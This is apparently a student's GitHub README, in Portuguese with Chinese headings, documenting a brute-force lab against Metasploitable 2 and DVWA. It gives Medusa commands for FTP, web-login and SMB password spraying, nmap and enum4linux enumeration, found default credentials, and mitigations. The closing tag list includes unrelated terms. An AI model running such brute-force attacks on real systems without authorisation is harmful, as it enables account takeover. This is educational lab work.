EliasJose1980/brute-force-lab-kali-medusa

# brute-force-lab-kali-medusa Brute Force Lab com Kali Linux e Medusa ## 项目描述 Este projeto demonstra a execução de testes de força bruta em ambiente controlado utilizando **Kali Linux**, **Medusa** e máquinas vulneráveis. O objetivo é simular cenários reais de ataque para fins educacionais, entendendo vulnerabilidades e aplicando boas práticas de mitigação. ## 目标 * Simular ataques de força bruta em diferentes serviços * Utilizar ferramentas de segurança ofensiva * Documentar processos técnicos * Propor medidas de mitigação * Criar portfólio em cibersegurança ## 使用环境 * Kali Linux (Atacante) * Metasploitable 2 (Alvo) * DVWA (Aplicação Web Vulnerável) * VirtualBox * Rede: Host-Only ## 环境配置 1. Criar duas VMs no VirtualBox: * Kali Linux * Metasploitable 2 2. Configurar rede: * Tipo: Host-Only 3. Identificar IP do alvo: ``` ifconfig ``` ## 枚举 Antes dos ataques, foi realizada varredura com: ``` nmap -sV ``` Serviços identificados: * FTP (21) * SMB (139/445) * HTTP (80) ## 攻击 1: FTP 暴力破解 ``` medusa -h -u msfadmin -P wordlists/basic-wordlist.txt -M ftp ``` Resultado: * Login encontrado: `msfadmin / msfadmin` ## 攻击 2: DVWA (Web 登录) Configuração: * DVWA Security: LOW Exemplo de tentativa automatizada: ``` medusa -h -u admin -P wordlists/basic-wordlist.txt -M http ``` Resultado: * Credenciais descobertas com sucesso ## 攻击 3: SMB (密码喷洒) Enumeração de usuários: ``` enum4linux -a ``` Ataque: ``` medusa -h -U users.txt -P wordlists/basic-wordlist.txt -M smbnt ``` Resultado: * Acesso a múltiplas contas com senha fraca ## 证据 As evidências dos testes estão na pasta `/images`. ## 缓解措施 * Implementar bloqueio por tentativas (rate limit) * Utilizar autenticação multifator (MFA) * Aplicar políticas de senha forte * Monitorar logs de autenticação * Desabilitar serviços desnecessários ## 学习 * Importância da enumeração antes do ataque * Fragilidade de senhas fracas * Impacto de má configuração de serviços * Relevância de ambientes controlados para aprendizado ## 法律警告 Este projeto foi realizado em ambiente controlado para fins educacionais. Não utilize essas técnicas em sistemas sem autorização. ## 作者 Elias Junior Estudante de Cibersegurança | Pentest | Bug Bounty

标签：DNS 解析, DOS头擦除, DVWA, FTP攻击, GitHub, Host-Only网络, Medusa, Metasploitable, Mr. Robot, PoC, SMB攻击, StruQ, 安全攻防, 安全测试, 实验室环境, 密码喷洒, 密码破解, 技术文档, 攻击性安全, 教育用途, 数据统计, 暴力破解, 污点分析, 渗透测试实践, 用户模式钩子绕过, 端口扫描, 网络安全学习, 网络枚举, 虚拟机环境, 认证安全